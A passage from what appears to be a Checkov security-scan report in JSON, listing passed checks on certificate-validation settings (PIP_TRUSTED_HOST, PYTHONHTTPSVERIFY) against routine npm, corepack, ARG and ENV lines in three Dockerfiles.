"14d83a642c69d4cf67fcdbeb6dace7ba464024fdcad52f8129d63c78042457cb" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 13, + "ENV NODE_ENV=test\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 13, + 13 + ], + "resource": "/Dockerfile.test.ENV", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-pip-trusted-host", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_16", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "435bba968d1d0b4c410ea33851637829a16b2ad878f0b9531a737c7a444f91b9" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-pip-trusted-host", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_16", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "57abb1bbe03890ab19f47e5f96b9cbcee02aab65f6980d523df42faf41b709fa" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm ci --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-pip-trusted-host", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_5", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "dbd32b6bad6b728919787011f82d60c50d7b2d1c079f814de2b1640696c98816" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-PYTHONHTTPSVERIFY-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_5", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20, + "resource_type": "RUN", + "hash": "6979b14e6a853ac150ffef85c5e28fd49c956054ea2cb1d01440e13b17260c4a" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 21, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 21, + 21 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-PYTHONHTTPSVERIFY-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_5", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21, + "resource_type": "RUN", + "hash": "c1f9cc0c42260bb0183d7e7b9ec2edab99837111ad42dbbdd7fad09ff3e37ab0" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 22, + "RUN npm run db:generate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 22, + 22 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-PYTHONHTTPSVERIFY-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_5", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22, + "resource_type": "RUN", + "hash": "1bf185fb6038f1b491f2a2686de4dd9869ccdd9c3e34d2772cf43bd368377aa6" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 23, + "RUN npm run build\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 23, + 23 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-PYTHONHTTPSVERIFY-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_5", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30, + "resource_type": "RUN", + "hash": "01c88e306f7db45ae7136e3bdb63c4b15978dd024f6ed18210961fc3db3df382" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 31, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 31, + 31 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-PYTHONHTTPSVERIFY-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_5", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ARG", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ARG NEXT_PUBLIC_API_URL\n", + "value": "NEXT_PUBLIC_API_URL", + "__startline__": 11, + "__endline__": 11 + }, + "label_": "resource: ARG", + "id_": "ARG", + "source_": "Dockerfile", + "content": "ARG NEXT_PUBLIC_API_URL\n", + "value": "NEXT_PUBLIC_API_URL", + "__startline__": 11, + "__endline__": 11, + "resource_type": "ARG", + "hash": "fded00a21c81cd45d8985324636a2acafc73bef594a45811ca0d68265da3f9dc" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 12, + "ARG NEXT_PUBLIC_API_URL\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 12, + 12 + ], + "resource": "/Dockerfile.production.ARG", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-PYTHONHTTPSVERIFY-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_5", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ARG", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ARG NEXT_PUBLIC_MARKETPLACE_URL\n", + "value": "NEXT_PUBLIC_MARKETPLACE_URL", + "__startline__": 12, + "__endline__": 12 + }, + "label_": "resource: ARG", + "id_": "ARG", + "source_": "Dockerfile", + "content": "ARG NEXT_PUBLIC_MARKETPLACE_URL\n", + "value": "NEXT_PUBLIC_MARKETPLACE_URL", + "__startline__": 12, + "__endline__": 12, + "resource_type": "ARG", + "hash": "11d98758a432fc03021573afe4df769dc34ff0a4aec966f558b5e00c71c6cf3b" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 13, + "ARG NEXT_PUBLIC_MARKETPLACE_URL\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 13, + 13 + ], + "resource": "/Dockerfile.production.ARG", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-PYTHONHTTPSVERIFY-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_5", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ARG", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ARG NEXT_PUBLIC_DASHBOARD_URL\n", + "value": "NEXT_PUBLIC_DASHBOARD_URL", + "__startline__": 13, + "__endline__": 13 + }, + "label_": "resource: ARG", + "id_": "ARG", + "source_": "Dockerfile", + "content": "ARG NEXT_PUBLIC_DASHBOARD_URL\n", + "value": "NEXT_PUBLIC_DASHBOARD_URL", + "__startline__": 13, + "__endline__": 13, + "resource_type": "ARG", + "hash": "4075db881e0d222faeb86e03db8a05d9a998deab344c05aee0e89d2426e01383" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 14, + "ARG NEXT_PUBLIC_DASHBOARD_URL\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 14, + 14 + ], + "resource": "/Dockerfile.production.ARG", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-PYTHONHTTPSVERIFY-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_5", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ARG", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ARG NEXT_PUBLIC_ADMIN_URL\n", + "value": "NEXT_PUBLIC_ADMIN_URL", + "__startline__": 14, + "__endline__": 14 + }, + "label_": "resource: ARG", + "id_": "ARG", + "source_": "Dockerfile", + "content": "ARG NEXT_PUBLIC_ADMIN_URL\n", + "value": "NEXT_PUBLIC_ADMIN_URL", + "__startline__": 14, + "__endline__": 14, + "resource_type": "ARG", + "hash": "a4c9bf1c4e349946074fb4c606d0db63c06a809d125e58ddd09427e4d929fd6a" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 15, + "ARG NEXT_PUBLIC_ADMIN_URL\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 15, + 15 + ], + "resource": "/Dockerfile.production.ARG", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-PYTHONHTTPSVERIFY-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_5", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ENV", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ENV NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL \\\n NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL \\\n NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL \\\n NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL\n", + "value": "NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL", + "__startline__": 15, + "__endline__": 18 + }, + "label_": "resource: ENV", + "id_": "ENV", + "source_": "Dockerfile", + "content": "ENV NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL \\\n NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL \\\n NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL \\\n NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL\n", + "value": "NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL", + "__startline__": 15, + "__endline__": 18, + "resource_type": "ENV", + "hash": "65abe3eb0aadfa3b1ed513b9e21f4f8c4524ec8c298e7123de46806870b90557" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 16, + "ENV NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL \\\n" + ], + [ + 17, + " NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL \\\n" + ], + [ + 18, + " NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL \\\n" + ], + [ + 19, + " NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 16, + 19 + ], + "resource": "/Dockerfile.production.ENV", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-PYTHONHTTPSVERIFY-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_5", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ENV", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ENV NODE_ENV=production\n", + "value": "NODE_ENV=production", + "__startline__": 28, + "__endline__": 28 + }, + "label_": "resource: ENV", + "id_": "ENV", + "source_": "Dockerfile", + "content": "ENV NODE_ENV=production\n", + "value": "NODE_ENV=production", + "__startline__": 28, + "__endline__": 28, + "resource_type": "ENV", + "hash": "5a6afcff0e4c111b04ace6d372feb2943096034796456739be650482e87f3e0e" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 29, + "ENV NODE_ENV=production\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 29, + 29 + ], + "resource": "/Dockerfile.production.ENV", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-PYTHONHTTPSVERIFY-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_5", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "1d5fb0a211498b8baf37e5744578ad03459da7798534298981f23fdefb7eb757" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-PYTHONHTTPSVERIFY-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_5", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "fb809e4860a3131df821aea9480445cc6e2f66dd52744dab5f3d2ef5b2848436" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-PYTHONHTTPSVERIFY-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_5", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ENV", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "ENV NODE_ENV=test\n", + "value": "NODE_ENV=test", + "__startline__": 12, + "__endline__": 12 + }, + "label_": "resource: ENV", + "id_": "ENV", + "source_": "Dockerfile", + "content": "ENV NODE_ENV=test\n", + "value": "NODE_ENV=test", + "__startline__": 12, + "__endline__": 12, + "resource_type": "ENV", + "hash": "14d83a642c69d4cf67fcdbeb6dace7ba464024fdcad52f8129d63c78042457cb" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 13, + "ENV NODE_ENV=test\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 13, + 13 + ], + "resource": "/Dockerfile.test.ENV", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-PYTHONHTTPSVERIFY-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_5", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "435bba968d1d0b4c410ea33851637829a16b2ad878f0b9531a737c7a444f91b9" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": 